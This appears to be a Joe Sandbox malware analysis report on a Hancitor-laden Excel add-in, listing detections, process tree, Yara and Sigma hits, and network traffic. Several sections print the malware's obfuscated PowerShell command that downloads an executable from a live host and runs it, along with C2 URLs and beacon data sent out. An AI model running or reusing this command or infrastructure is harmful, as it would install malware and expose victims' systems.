Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Sample Name:0708_5355150121.xll
Analysis ID:445958
MD5:41e0318dfdb1c180a375a7efc712649e
SHA1:f0c230010c7b85544c25879d4daf74479360e1bc
SHA256:73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Tags:dllxll
Infos:

Most interesting Screenshot:

Detection

Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
May check the online IP address of the machine
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6120 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
    • mshta.exe (PID: 5756 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • powershell.exe (PID: 5944 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5788 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • snd32sys.exe (PID: 2160 cmdline: 'C:\Users\Public\snd32sys.exe' MD5: ED1921467F6784AF6BDCA40A06A541B5)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x18c6a:$s1: poWerSHEll
00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1563:$s1: powershell
  • 0x1572:$s1: poWerSHEll
  • 0x1563:$sr1: powershell
  • 0x1563:$sn1: powershell
Click to see the 6 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
16.3.snd32sys.exe.12f4305.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
    16.3.snd32sys.exe.12f4305.0.unpackHancitorHancitor Payloadkevoreilly
    • 0x54f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
    16.3.snd32sys.exe.12f4305.0.raw.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
      16.3.snd32sys.exe.12f4305.0.raw.unpackHancitorHancitor Payloadkevoreilly
      • 0x114f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
      16.2.snd32sys.exe.610000.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
        Click to see the 1 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Execution from Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\snd32sys.exe' , CommandLine: 'C:\Users\Public\snd32sys.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\snd32sys.exe, NewProcessName: C:\Users\Public\snd32sys.exe, OriginalFileName: C:\Users\Public\snd32sys.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5944, ProcessCommandLine: 'C:\Users\Public\snd32sys.exe' , ProcessId: 2160
        Sigma detected: MSHTA Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6120, ProcessCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5756
        Sigma detected: Mshta Spawning Windows ShellShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
        Sigma detected: Non Interactive PowerShellShow sources
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: 0708_5355150121.xllVirustotal: Detection: 23%Perma Link
        Source: 0708_5355150121.xllReversingLabs: Detection: 17%
        Source: 16.2.snd32sys.exe.610000.0.unpackAvira: Label: TR/Dropper.Gen

        Location Tracking:

        barindex
        Yara detected HancitorShow sources
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612CB0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612CB0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612CF7 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612CF7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612D78
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612D58 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612D58
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612D35 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,16_2_00612D35

        Compliance:

        barindex
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\Public\snd32sys.exeUnpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
        Source: 0708_5355150121.xllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,16_2_0065838E
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657FD2 FindFirstFileExW,16_2_00657FD2

        Software Vulnerabilities:

        barindex
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: http://sudepallon.com/8/forum.php
        Source: Malware configuration extractorURLs: http://anspossthrly.ru/8/forum.php
        Source: Malware configuration extractorURLs: http://thentabecon.ru/8/forum.php
        Downloads files with wrong headers with respect to MIME Content-TypeShow sources
        Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        May check the online IP address of the machineShow sources
        Source: C:\Users\Public\snd32sys.exeDNS query: name: api.ipify.org
        Source: C:\Users\Public\snd32sys.exeDNS query: name: api.ipify.org
        Source: C:\Users\Public\snd32sys.exeDNS query: name: api.ipify.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 08 Jul 2021 14:30:58 GMTContent-Type: image/jpegContent-Length: 763392Connection: keep-aliveLast-Modified: Wed, 07 Jul 2021 13:36:32 GMTETag: "60e5ade0-ba600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
        Source: Joe Sandbox ViewIP Address: 23.21.173.155 23.21.173.155
        Source: Joe Sandbox ViewIP Address: 77.222.42.67 77.222.42.67
        Source: Joe Sandbox ViewASN Name: SWEB-ASRU SWEB-ASRU
        Source: global trafficHTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
